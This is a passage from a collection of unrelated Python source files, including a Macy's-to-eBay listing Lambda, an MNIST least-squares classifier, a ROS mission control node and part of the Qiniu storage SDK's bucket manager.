# filter title solely for words
item_details["Title"] = strip_text(soup.find("div", attrs={"data-el": "product-title"}).text, rejoin_str=True)
# DESCRIPTION
item_details["Description"] = soup.find(attrs={"data-el": "product-details"}).text
# IMAGES
item_details["PictureDetails"] = []
# for each img item in product detail
for img_element in soup.find("ul", class_="c-reset scroller swiper animated").find_all("img"):
# get elt xml
xml_str = str(img_element)
# get info after src attribute
url = xml_str.split(" src=\"")[1]
# clip info after next quote
url = url[:url.find("\" ")]
# append the image url
item_details["PictureDetails"] += [{"PictureURL": url}]
# PRICE
# get original price html element
price_html_text = soup.find(attrs={"data-auto": "main-price"}).text
without_punctuation = strip_text(price_html_text)
# get price, assuming it is the second element
item_details["StartPrice"] = without_punctuation[1]
################# START ITEM SPECIFICS #################
item_details["ItemSpecifics"] = {"NameValueList": [
{"Name": "SizeType", "Value": "Regular"},
# {"Name": "Inseam", "Value": "33"},
# {"Name": "Sleeve Style", "Value": "Short Sleeve"}
]}
name_value_list = item_details["ItemSpecifics"]["NameValueList"]
# --> Color
name_value_list.append({
"Name": "Color",
"Value": soup.find(attrs={"data-auto": "selected-color"}).text
})
# --> Brand
name_value_list.append({
"Name": "Brand",
"Value": strip_text(soup.find(attrs={"data-auto": "product-brand"}).text, rejoin_str=True)
})
# --> Size
name_value_list.append({
"Name": "Size",
"Value": strip_text(
soup.find("li", class_="swatch-itm static",
attrs={"aria-disabled": "false"}).text
)[0]
})
# breadcrumbs --> ["Macy's", 'Women', 'Coats']
breadcrumbs = strip_text(
soup.find("div", class_="breadcrumbs-container").text)
# --> Department
department = breadcrumbs[1]
name_value_list.append({"Name": "Department", "Value": department})
# --> Style
style = breadcrumbs[-1]
name_value_list.append({"Name": "Style", "Value": style})
# --> Type
item_type = breadcrumbs[-1]
name_value_list.append({"Name": "Type", "Value": item_type})
################# END ITEM SPECIFICS #################
return item_details
def format_item_details(message):
item_details = None
"""Formats webpage data for the product into an ebay-friendly template
:param message: message object representing message in the queue
"""
host_functions = {
"macys": get_macys_item_info
}
driver = webdriver.Chrome("./chromedriver", options=chrome_options)
# Set the window size
driver.set_window_size(1500, 1280)
# get the url from the body of the sqs record
item_url = message.body
# go to said items webpage in selenium
driver.get(item_url)
# wait a specified amount of time for elements to be updated
time.sleep(3)
# pass the output to BS4
soup = BeautifulSoup(driver.page_source, "xml")
# close the window (all tabs)
driver.quit()
# get the specific host
host = item_url.split(".")[1]
# use function based on host
try:
# try to find our host url's function
try:
get_item_info = host_functions[host]
except:
LOGGER.error(f"failed to find get_item_info function for {host}")
traceback.print_exc()
# attempt to fetch the details for this item
item_details = get_item_info(soup)
except:
LOGGER.error(f"failed to finish getting item info from {host}")
traceback.print_exc()
raise ValueError
return item_details
def list_ebay_item(item_details):
LOGGER.info(
f"Hello from the eBay Item Lister Lambda! Now listing item: {item_details['Title']}"
)
if os.environ["ENV"] == "SANDBOX":
domain = "api.sandbox.ebay.com"
elif os.environ["ENV"] == "PRODUCTION":
domain = "api.ebay.com"
else:
raise ValueError(f"Invalid market_environment: {os.environ['ENV']}")
#!/usr/bin/env python3
api = Connection(
config_file=os.environ.get('EBAY_YAML'),
domain=domain,
appid=os.environ["CLIENT_ID"],
certid=os.environ["DEV_ID"],
devid=os.environ["CLIENT_SECRET"],
token=os.environ["TOKEN"],
password=os.environ["PASSWORD"],
debug=True
)
# create set of style and dept for addition to category search
title_specifics = set(["Style", "Department"])
item_specifics = item_details["ItemSpecifics"]["NameValueList"]
# get the suggested ebay category
category_response = api.execute(
'GetSuggestedCategories', {
# concatenate the style and department
'Query': " ".join(
[item["Value"] for item in item_specifics if item["Name"] in title_specifics] + [item_details["Title"]]
)
}
)
# unwrap suggested categories
suggested_categories = category_response.dict()['SuggestedCategoryArray']['SuggestedCategory']
# set primary category
primary_category_id = suggested_categories[0]["Category"]["CategoryID"]
request = {
"Item": {
**item_details,
# "Title": title,
"Country": "US",
"Location": "US",
"Site": "US",
"ConditionID": "1000", # new for now
"PaymentMethods": "PayPal", # paypal for now
"PayPalEmailAddress": os.environ["EMAIL"],
# Clothing, Shoes & Accessories
"PrimaryCategory": {"CategoryID": primary_category_id},
# "PrimaryCategory": {"CategoryID": "57989"},
# "Description": description, # description passed in from elsewhere
"Quantity": "1",
"ListingDuration": "GTC", # make a listing only last 14 days
# "StartPrice": price,
"Currency": "USD",
"ListingType": "FixedPriceItem",
# "ItemSpecifics": {
# "NameValueList": [
# {"Name": "Color", "Value": "Black"},
# {"Name": "Brand", "Value": "Alternative"},
# {"Name": "Size", "Value": "M"},
# {"Name": "SizeType", "Value": "Regular"},
# {"Name": "Inseam", "Value": "33"},
# {"Name": "Style", "Value": "Polo Shirt"},
# {"Name": "Sleeve Style", "Value": "Short Sleeve"},
# {"Name": "Type", "Value": "Short Sleeve"},
# {"Name": "Department", "Value": "Men"}
# ]
# },
# "PictureDetails": [
# { "PictureURL": "http://www.itcircleconsult.com/eb2017/4a.png" }
# ],
"ReturnPolicy": {
# to avoid handling two-step returns to two different places, we will
"ReturnsAcceptedOption": "ReturnsNotAccepted",
# TODO: REMOVE THESE COMMENTS upon successful api call
# "RefundOption": "MoneyBack",
# "ReturnsWithinOption": "Days_30",
# "Description": "If you are not satisfied, return the keyboard.",
# "ShippingCostPaidByOption": "Seller"
},
"ShippingDetails": {
"ShippingServiceOptions": {
"FreeShipping": "True",
"ShippingService": "USPSMedia"
}
},
# Shorter dispatch times are always better if you can reliably meet them.
"DispatchTimeMax": "2"
}
}
# trigger request and log the response to cloudwatch
response = api.execute("AddItem", request)
print(response.status)
return response
def lambda_handler(event, context):
"""lambda function to list items to eBay's sandbox or production marketplace"""
# get our sqs queue
sqs_queue = get_queue(os.environ["SQS_QUEUE_NAME"])
# fetch the sqs queue messages in batches
sqs_messages = receive_messages(queue=sqs_queue, max_number=2, wait_time=0)
if len(sqs_messages) == 0:
return { "status": 500, "body": "empty queue"} # The server encountered an unexpected condition which prevented it from fulfilling the request.
# var for number of successful ebay postings
successes = 0
# for each message
for msg in sqs_messages:
try:
# format the item in the message for posting
item_details = format_item_details(msg)
# list the item
resp = list_ebay_item(item_details)
LOGGER.warn(resp.text)
successes += 1
except:
LOGGER.error(f"{msg.body} failed to be posted to ebay")
traceback.print_exc()
if successes == 2:
return { "status": 200 } # full success
LOGGER.error(f"{sqs_messages} successfully posted to ebay")
elif successes == 1:
return { "status": 206 } # The HTTP 206 Partial Content success status response code indicates that the request has succeeded and has the body contains the requested ranges of data
else: # successes ≤ 0 or successes ≥ 3
return { "status": 500 } # The server encountered an unexpected condition which prevented it from fulfilling the request.
# TEST OBJECTS ####################################
event = {
"detail": {
"title": "Alternative Gray Citadel Joggers",
"price": "29.50",
"market_environment": os.environ["ENV"],
"description": "they're pretty good, just a lil worn and the drawstring is frayed",
"quantity": "1"
}
}
event2 = {
"message": [
{
"messageId": "059f36b4-87a3-44ab-83d2-661975830a7d",
"receiptHandle": "AQEBwJnKyrHigUMZj6rYigCgxlaS3SLy0a...",
"body": {
"url": "https://www.macys.com/shop/product/calvin-klein-shine-hooded-packable-down-puffer-coat-created-for-macys?ID=11031427&CategoryID=3536,https://www.macys.com/shop/product/cole-haan-box-quilt-down-puffer-coat?ID=2813247&CategoryID=3536"
},
"attributes": {
"ApproximateReceiveCount": "1",
"SentTimestamp": "1545082649183",
"SenderId": "AIDAIENQZJOLO23YVJ4VO",
"ApproximateFirstReceiveTimestamp": "1545082649185"
},
"messageAttributes": {},
"md5OfBody": "098f6bcd4621d373cade4e832627b4f6",
"eventSource": "aws:sqs",
"eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:my-queue",
"awsRegion": "us-east-2"
}
]
}
if __name__ == "__main__":
# run test code
context = None
# print results
print(lambda_handler(event2, None))
# {
# 'Category':
# {'CategoryID': '2887', 'CategoryName': 'Soccer-International
# Clubs', 'CategoryParentID': ['64482', '24409'], 'CategoryParentName':
# ['Sports Mem, Cards & Fan Shop', 'Fan Apparel & Souvenirs']},
# 'PercentItemFound': '89'}
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 26 15:47:35 2019
@author: Dominic
"""
import numpy as np
def generate_points_on_hypercube(nsamples,origin,poffs,p=None,uvecs=None):
if uvecs is None:
epsilon = []
bounds = []
for i in range(len(origin)):
origin_c = np.copy(origin)
poffs_c = np.copy(poffs)
origin_c[i] = poffs_c[i]
bounds += [origin_c]
print(origin_c,poffs_c)
epsilon += [np.linalg.norm(origin_c-poffs_c)]
epsilon = np.array(epsilon)
if p is None:
p = epsilon/epsilon.sum()
print(p)
points = []
for i in range(nsamples):
face = np.random.choice(len(origin),p=p)
points+=[np.random.uniform(bounds[face],poffs)]
return np.array(points)
def clean_pointset(pointset):
pointset = np.copy(pointset)
for point in pointset:
toremove = np.where(np.all(np.less(pointset,point),axis=1))[0]
pointset = np.delete(pointset,toremove,axis=0)
#for point in pointset:
# print(np.less(pointset,point))
# print(np.where(np.logical_all(pointset<point)))
return pointset
if __name__ == "__main__":
p = generate_points_on_hypercube(200,[120,40],[-200,-300],None)
print(p)
import matplotlib.pyplot as plt
plt.scatter(*p.T)
plt.show()
|
nilq/baby-python
|
python
|
from bot import merger_bot
WEBHOOK_HOST = merger_bot.webhook_host
WEBHOOK_PORT = merger_bot.webhook_port
WEBHOOK_SSL_CERT = './SSL/webhook_cert.pem' # Путь к сертификату
WEBHOOK_SSL_PRIV = './SSL/webhook_pkey.pem' # Путь к приватному ключу
WEBHOOK_URL_BASE = "https://%s:%s" % (WEBHOOK_HOST, WEBHOOK_PORT)
WEBHOOK_URL_PATH = "/%s/" % merger_bot.telegram_token
OUR_URL = "put yours here"
|
nilq/baby-python
|
python
|
from mnist import MNIST
import sklearn.metrics as metrics
import numpy as np
NUM_CLASSES = 10
def load_dataset():
mndata = MNIST('./data/')
X_train, labels_train = map(np.array, mndata.load_training())
X_test, labels_test = map(np.array, mndata.load_testing())
X_train = X_train/255.0
X_test = X_test/255.0
X_train = X_train[:,:]
X_test = X_test[:,:]
return (X_train, labels_train), (X_test, labels_test)
def train(X_train, y_train):
''' Build a model from X_train -> y_train '''
dim = X_train.shape[1]
label = y_train.shape[1]
mat1 = np.zeros((dim,dim))
mat2 = np.zeros((dim,label))
n=0
for x_i in X_train:
y_i = y_train[n]
mat1 += np.outer(x_i,x_i)
mat2 += np.outer(x_i,y_i)
n+=1
while np.linalg.matrix_rank(mat1) != dim:
mat1 = mat1 + 0.0003*np.eye(dim)
model = np.dot(np.linalg.inv(mat1),mat2)
return model
def one_hot(labels_train):
'''Convert categorical labels 0,1,2,....9 to standard basis vectors in R^{10} '''
label_int = np.array(labels_train)
label_bool = np.zeros((labels_train.size,10), dtype=int)
label_bool[np.arange(labels_train.size),label_int] = 1
return label_bool
def predict(x,y, model):
''' From model and data points, output prediction vectors '''
m = 0
hits = 0
DataSize = y.shape[0]
for m in range(DataSize):
xx=x[m]
Predict_values = list(np.dot(model.T,xx))
winners = [i for i, xx in enumerate(Predict_values) if xx==max(Predict_values)]
winner = winners[len(winners)-1]
z = [0 for xx in Predict_values]
z[winner] =1
prediction = z
actual = list(y[m])
if prediction == actual:
hits += 1
return hits
if __name__ == "__main__":
(X_train, labels_train), (X_test, labels_test) = load_dataset()
y_train = one_hot(labels_train)
y_test = one_hot(labels_test)
model = train(X_train, y_train)
train_hits=predict(X_train,y_train,model)
test_hits=predict(X_test,y_test,model)
Train_accuracy = train_hits/float(y_train.shape[0])*100
Test_accuracy = test_hits/float(y_test.shape[0])*100
print "Training Accuracy = "+str(Train_accuracy)+"%","("+str(train_hits)+"/"+str(y_train.shape[0])+")"
print "Test Accuracy = "+str(Test_accuracy)+"%","("+str(test_hits)+"/"+str(y_test.shape[0])+")"
|
nilq/baby-python
|
python
|
import djclick as click
from core.utils import get_approximate_date
def gather_event_date_from_prompt():
date = None
while date is None:
date_str = click.prompt(
click.style(
"What is the date of the event? (Format: DD/MM/YYYY or MM/YYYY)",
bold=True, fg='yellow'))
date = get_approximate_date(date_str)
if date is None:
click.secho("Wrong format! Try again :)", bold=True, fg='red')
return date
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from quixote.errors import TraversalError
from vilya.views.util import jsonize, http_method
from vilya.models.linecomment import PullLineComment
from vilya.models.project import CodeDoubanProject
from vilya.libs.template import st
_q_exports = []
class CodeReviewUI(object):
_q_exports = ['delete', 'edit']
def __init__(self, proj_name):
self.proj_name = proj_name
self.code_review = None
def _q_lookup(self, request, comment_id):
comment = PullLineComment.get(comment_id)
if not comment:
raise TraversalError(
"Unable to find comment %s" % comment_id)
else:
self.code_review = comment
return self
@jsonize
def delete(self, request):
user = request.user
if self.code_review.author == user.name:
ok = self.code_review.delete()
if ok:
return {'r': 1} # FIXME: 这里 r=1 表示成功,跟其他地方不统一
return {'r': 0}
@jsonize
@http_method(methods=['POST'])
def edit(self, request):
user = request.user
project = CodeDoubanProject.get_by_name(self.proj_name)
content = request.get_form_var(
'pull_request_review_comment', '').decode('utf-8')
if self.code_review.author == user.name:
self.code_review.update(content)
linecomment = PullLineComment.get(self.code_review.id)
pullreq = True
return dict(
r=0, html=st('/pull/ticket_linecomment.html', **locals()))
return dict(r=1)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from std_msgs.msg import Float32, UInt8
from sensor_msgs.msg import Image, CompressedImage
import enum
import time
import rospy
from cv_bridge import CvBridge
class ControlNode:
def __init__(self):
self.traffic_mission_start = False
self.parking_mission_start = False
self.crossbar_mission_start = False
self.tunnel_mission_start = False
self.intersection_mission_start = False
self.construction_mission_start = False
self.traffic_mission_success = False
self.parking_mission_success = False
self.crossbar_mission_success = False
self.tunnel_mission_success = False
self.intersection_mission_success = False
self.construction_mission_success = False
self.mode_step = enum.Enum('step_of_mode', 'normal_mode traffic_mode parking_mode crossbar_mode tunnel_mode intersection_mode construction_mode')
#self.mode_num = self.mode_step.normal_mode.value
self.mode_num = self.mode_step.traffic_mode.value
#self.mode_num = self.mode_step.crossbar_mode.value
#self.mode_num = self.mode_step.parking_mode.value
#self.mode_num = self.mode_step.tunnel_mode.value
#self.mode_num = self.mode_step.intersection_mode.value
#self.mode_num = self.mode_step.construction_mode.value
self.sequence_num = 1
self.driving_time_pre = time.time()
self.mission_time_pre = time.time()
self.sign_check_time_pre = time.time()
self.pre_check_time_pre = time.time()
self.mission_timeout_pre = time.time()
self.mission_time_delay = 0.1
self.mission_timeout = 0.0
self.img_status = 'compressed' # give 'raw' or 'compressed'
if self.img_status == 'raw':
self.cv_bridge = CvBridge()
self.sub_img_cam = rospy.Subscriber('/image_raw', Image, self.cb_image_receive, queue_size=1)
elif self.img_status == 'compressed':
self.sub_img_cam = rospy.Subscriber('/image_raw/compressed', CompressedImage, self.cb_image_receive, queue_size=1)
self.sub_seq_change = rospy.Subscriber('/mission/seq/change', UInt8, self.cb_sequence_num, queue_size=1)
self.sub_delay_change = rospy.Subscriber('/mission/time/delay', Float32, self.cb_delay_change, queue_size=1)
self.sub_timeout_change = rospy.Subscriber('/mission/time/timeout', Float32, self.cb_timeout_change, queue_size=1)
self.pub_img_driving = rospy.Publisher('/controller/image/driving', CompressedImage, queue_size=1)
self.pub_img_sign = rospy.Publisher('/controller/image/sign', CompressedImage, queue_size=1)
self.pub_img_mission = rospy.Publisher('/controller/image/mission', CompressedImage, queue_size=1)
self.pub_seq_normal = rospy.Publisher('/controller/seq/normal', UInt8, queue_size=1)
self.pub_seq_traffic = rospy.Publisher('/controller/seq/traffic', UInt8, queue_size=1)
self.pub_seq_parking = rospy.Publisher('/controller/seq/parking', UInt8, queue_size=1)
self.pub_seq_crossbar = rospy.Publisher('/controller/seq/crossbar', UInt8, queue_size=1)
self.pub_seq_tunnel = rospy.Publisher('/controller/seq/tunnel', UInt8, queue_size=1)
self.pub_seq_intersection = rospy.Publisher('/controller/seq/intersection', UInt8, queue_size=1)
self.pub_seq_construction = rospy.Publisher('/controller/seq/construction', UInt8, queue_size=1)
loop_rate = rospy.Rate(100)
while not rospy.is_shutdown():
if self.mode_num == self.mode_step.normal_mode.value:
self.fn_normal_publish()
else:
self.fn_mission_publish()
loop_rate.sleep()
def fn_normal_publish(self):
time_now = time.time()
if self.traffic_mission_start:
rospy.loginfo('mode change : traffic mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.traffic_mode.value
self.sequence_num = 1
elif self.parking_mission_start:
rospy.loginfo('mode change : parking mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.parking_mode.value
self.sequence_num = 1
elif self.crossbar_mission_start:
rospy.loginfo('mode change : crossbar mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.crossbar_mode.value
self.sequence_num = 1
elif self.tunnel_mission_start:
rospy.loginfo('mode change : tunnel mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.tunnel_mode.value
self.sequence_num = 1
elif self.intersection_mission_start:
rospy.loginfo('mode change : intersection mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.intersection_mode.value
self.sequence_num = 1
elif self.construction_mission_start:
rospy.loginfo('mode change : construction mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.construction_mode.value
self.sequence_num = 1
if (time_now - self.mission_time_pre) >= 0.1:
# rospy.loginfo('[normal] mission sequence publish, time: {0:.4f}'.format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_normal.publish(self.sequence_num)
# TODO: 미션 스타트 지점 퍼블리시
if (time_now - self.pre_check_time_pre) >= 0.1:
# rospy.loginfo(' pre check sequence publish, time: {0:.4f}'.format(time_now - self.pre_check_time_pre))
self.pre_check_time_pre = time_now
if not self.traffic_mission_success:
self.pub_seq_traffic.publish(90)
if not self.parking_mission_success and self.construction_mission_success:
self.pub_seq_parking.publish(90)
if not self.crossbar_mission_success and self.parking_mission_success:
self.pub_seq_crossbar.publish(90)
if not self.tunnel_mission_success and self.crossbar_mission_success:
self.pub_seq_tunnel.publish(90)
if not self.intersection_mission_success and self.traffic_mission_success:
self.pub_seq_intersection.publish(90)
if not self.construction_mission_success and self.intersection_mission_success:
self.pub_seq_construction.publish(90)
def fn_mission_publish(self):
time_now = time.time()
if self.mode_num == self.mode_step.traffic_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('traffic mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_traffic.publish(self.sequence_num)
elif self.mode_num == self.mode_step.parking_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('parking mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_parking.publish(self.sequence_num)
elif self.mode_num == self.mode_step.crossbar_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('crossbar mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_crossbar.publish(self.sequence_num)
elif self.mode_num == self.mode_step.tunnel_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('tunnel mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_tunnel.publish(self.sequence_num)
elif self.mode_num == self.mode_step.intersection_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('intersection mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_intersection.publish(self.sequence_num)
elif self.mode_num == self.mode_step.construction_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('construction mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_construction.publish(self.sequence_num)
else:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
rospy.logerr('[Error] Wrong Mission Mode')
if self.mission_timeout > 0.1 and (time_now - self.mission_timeout_pre) > self.mission_timeout:
rospy.logwarn('[warning !!] mode change fail !!')
self.traffic_pre_check = False
self.traffic_sign = False
self.pub_seq_traffic.publish(99)
self.pub_seq_parking.publish(99)
self.pub_seq_crossbar.publish(99)
self.pub_seq_tunnel.publish(99)
self.pub_seq_intersection.publish(99)
self.pub_seq_construction.publish(99)
self.mode_num = self.mode_step.normal_mode.value
self.sequence_num = 1
def cb_image_receive(self, msg):
time_now = time.time()
if self.img_status == 'raw':
img = self.cv_bridge.imgmsg_to_cv2(msg, "bgr8")
msg = self.cv_bridge.cv2_to_compressed_imgmsg(img, "jpg")
# TODO: 표지판 이미지 퍼블리시
if (time_now - self.sign_check_time_pre) >= 0.01 and self.mode_num == self.mode_step.intersection_mode.value:
#rospy.loginfo(' sign image publish, time: ' + "{0:.4f}".format(time_now - self.sign_check_time_pre))
self.sign_check_time_pre = time_now
self.pub_img_sign.publish(msg)
# TODO: 드라이빙 이미지 퍼블리시
if (time_now - self.driving_time_pre) >= 0.1:
#rospy.loginfo(' driving image publish, time: ' + "{0:.4f}".format(time_now - self.driving_time_pre))
self.driving_time_pre = time_now
self.pub_img_driving.publish(msg)
# TODO: 미션 이미지 퍼블리시
self.pub_img_mission.publish(msg)
def cb_sequence_num(self, msg):
rospy.loginfo('sequence change : ' + str(msg.data))
if msg.data == 100: # squence end point
self.traffic_mission_start = False
self.parking_mission_start = False
self.crossbar_mission_start = False
self.tunnel_mission_start = False
self.intersection_mission_start = False
self.construction_mission_start = False
if self.mode_num == self.mode_step.traffic_mode.value:
self.traffic_mission_success = True
elif self.mode_num == self.mode_step.parking_mode.value:
self.parking_mission_success = True
elif self.mode_num == self.mode_step.crossbar_mode.value:
self.crossbar_mission_success = True
elif self.mode_num == self.mode_step.tunnel_mode.value:
self.tunnel_mission_success = True
elif self.mode_num == self.mode_step.intersection_mode.value:
self.intersection_mission_success = True
elif self.mode_num == self.mode_step.construction_mode.value:
self.construction_mission_success = True
self.mode_num = self.mode_step.normal_mode.value
self.sequence_num = 1
elif msg.data == 91:
self.traffic_mission_start = True
elif msg.data == 92:
self.parking_mission_start = True
elif msg.data == 93:
self.crossbar_mission_start = True
elif msg.data == 94:
self.tunnel_mission_start = True
elif msg.data == 95:
self.intersection_mission_start = True
elif msg.data == 96:
self.construction_mission_start = True
else:
self.sequence_num = msg.data
if self.mode_num == self.mode_step.traffic_mode.value:
self.pub_seq_traffic.publish(self.sequence_num)
elif self.mode_num == self.mode_step.parking_mode.value:
self.pub_seq_parking.publish(self.sequence_num)
elif self.mode_num == self.mode_step.crossbar_mode.value:
self.pub_seq_crossbar.publish(self.sequence_num)
elif self.mode_num == self.mode_step.tunnel_mode.value:
self.pub_seq_tunnel.publish(self.sequence_num)
elif self.mode_num == self.mode_step.intersection_mode.value:
self.pub_seq_intersection.publish(self.sequence_num)
elif self.mode_num == self.mode_step.construction_mode.value:
self.pub_seq_construction.publish(self.sequence_num)
self.mission_timeout_pre = time.time()
def cb_delay_change(self, msg):
self.mission_time_delay = msg.data
def cb_timeout_change(self, msg):
self.mission_timeout = msg.data
@staticmethod
def main():
rospy.spin()
if __name__ == '__main__':
rospy.init_node('Control_Node')
node = ControlNode()
node.main()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from qiniu import config
from qiniu.utils import urlsafe_base64_encode, entry
from qiniu import http
class BucketManager(object):
"""空间管理类
主要涉及了空间资源管理及批量操作接口的实现,具体的接口规格可以参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/
Attributes:
auth: 账号管理密钥对,Auth对象
"""
def __init__(self, auth):
self.auth = auth
def list(self, bucket, prefix=None, marker=None, limit=None, delimiter=None):
"""前缀查询:
1. 首次请求 marker = None
2. 无论 err 值如何,均应该先看 ret.get('items') 是否有内容
3. 如果后续没有更多数据,err 返回 EOF,marker 返回 None(但不通过该特征来判断是否结束)
具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/list.html
Args:
bucket: 空间名
prefix: 列举前缀
marker: 列举标识符
limit: 单次列举个数限制
delimiter: 指定目录分隔符
Returns:
一个dict变量,类似 {"hash": "<Hash string>", "key": "<Key string>"}
一个ResponseInfo对象
一个EOF信息。
"""
options = {
'bucket': bucket,
}
if marker is not None:
options['marker'] = marker
if limit is not None:
options['limit'] = limit
if prefix is not None:
options['prefix'] = prefix
if delimiter is not None:
options['delimiter'] = delimiter
url = 'http://{0}/list'.format(config.get_default('default_rsf_host'))
ret, info = self.__get(url, options)
eof = False
if ret and not ret.get('marker'):
eof = True
return ret, eof, info
def stat(self, bucket, key):
"""获取文件信息:
获取资源的元信息,但不返回文件内容,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/stat.html
Args:
bucket: 待获取信息资源所在的空间
key: 待获取资源的文件名
Returns:
一个dict变量,类似:
{
"fsize": 5122935,
"hash": "ljfockr0lOil_bZfyaI2ZY78HWoH",
"mimeType": "application/octet-stream",
"putTime": 13603956734587420
}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
return self.__rs_do('stat', resource)
def delete(self, bucket, key):
"""删除文件:
删除指定资源,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/delete.html
Args:
bucket: 待获取信息资源所在的空间
key: 待获取资源的文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
return self.__rs_do('delete', resource)
def rename(self, bucket, key, key_to):
"""重命名文件:
给资源进行重命名,本质为move操作。
Args:
bucket: 待操作资源所在空间
key: 待操作资源文件名
key_to: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
return self.move(bucket, key, bucket, key_to)
def move(self, bucket, key, bucket_to, key_to):
"""移动文件:
将资源从一个空间到另一个空间,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/move.html
Args:
bucket: 待操作资源所在空间
bucket_to: 目标资源空间名
key: 待操作资源文件名
key_to: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
to = entry(bucket_to, key_to)
return self.__rs_do('move', resource, to)
def copy(self, bucket, key, bucket_to, key_to):
"""复制文件:
将指定资源复制为新命名资源,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/copy.html
Args:
bucket: 待操作资源所在空间
bucket_to: 目标资源空间名
key: 待操作资源文件名
key_to: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
to = entry(bucket_to, key_to)
return self.__rs_do('copy', resource, to)
def fetch(self, url, bucket, key=None):
"""抓取文件:
从指定URL抓取资源,并将该资源存储到指定空间中,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/fetch.html
Args:
url: 指定的URL
bucket: 目标资源空间
key: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = urlsafe_base64_encode(url)
to = entry(bucket, key)
return self.__io_do('fetch', resource, 'to/{0}'.format(to))
def prefetch(self, bucket, key):
"""镜像回源预取文件:
从镜像源站抓取资源到空间中,如果空间中已经存在,则覆盖该资源,具体规格参考
http://developer.qiniu.com/docs/v6/api/reference/rs/prefetch.html
Args:
bucket: 待获取资源所在的空间
key: 代获取资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
return self.__io_do('prefetch', resource)
def change_mime(self, bucket, key, mime):
"""修改文件mimeType:
主动修改指定资源的文件类型,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/chgm.html
Args:
bucket: 待操作资源所在空间
key: 待操作资源文件名
mime: 待操作文件目标mimeType
"""
resource = entry(bucket, key)
encode_mime = urlsafe_base64_encode(mime)
return self.__rs_do('chgm', resource, 'mime/{0}'.format(encode_mime))
def batch(self, operations):
"""批量操作:
在单次请求中进行多个资源管理操作,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/batch.html
Args:
operations: 资源管理操作数组,可通过
Returns:
一个dict变量,返回结果类似:
[
{ "code": <HttpCode int>, "data": <Data> },
{ "code": <HttpCode int> },
{ "code": <HttpCode int> },
{ "code": <HttpCode int> },
{ "code": <HttpCode int>, "data": { "error": "<ErrorMessage string>" } },
...
]
一个ResponseInfo对象
"""
url = 'http://{0}/batch'.format(config.get_default('default_rs_host'))
return self.__post(url, dict(op=operations))
def buckets(self):
"""获取所有空间名:
获取指定账号下所有的空间名。
Returns:
一个dict变量,类似:
[ <Bucket1>, <Bucket2>, ... ]
一个ResponseInfo对象
"""
return self.__rs_do('buckets')
def __rs_do(self, operation, *args):
return self.__server_do(config.get_default('default_rs_host'), operation, *args)
def __io_do(self, operation, *args):
return self.__server_do(config.get_default('default_io_host'), operation, *args)
def __server_do(self, host, operation, *args):
cmd = _build_op(operation, *args)
url = 'http://{0}/{1}'.format(host, cmd)
return self.__post(url)
def __post(self, url, data=None):
return http._post_with_auth(url, data, self.auth)
def __get(self, url, params=None):
return http._get(url, params, self.auth)
def _build_op(*args):
return '/'.join(args)
def build_batch_copy(source_bucket, key_pairs, target_bucket):
return _two_key_batch('copy', source_bucket, key_pairs, target_bucket)
def build_batch_rename(bucket, key_pairs):
return build_batch_move(bucket, key_pairs, bucket)
def build_batch_move(source_bucket, key_pairs, target_bucket):
return _two_key_batch('move', source_bucket, key_pairs, target_bucket)
def build_batch_delete(bucket, keys):
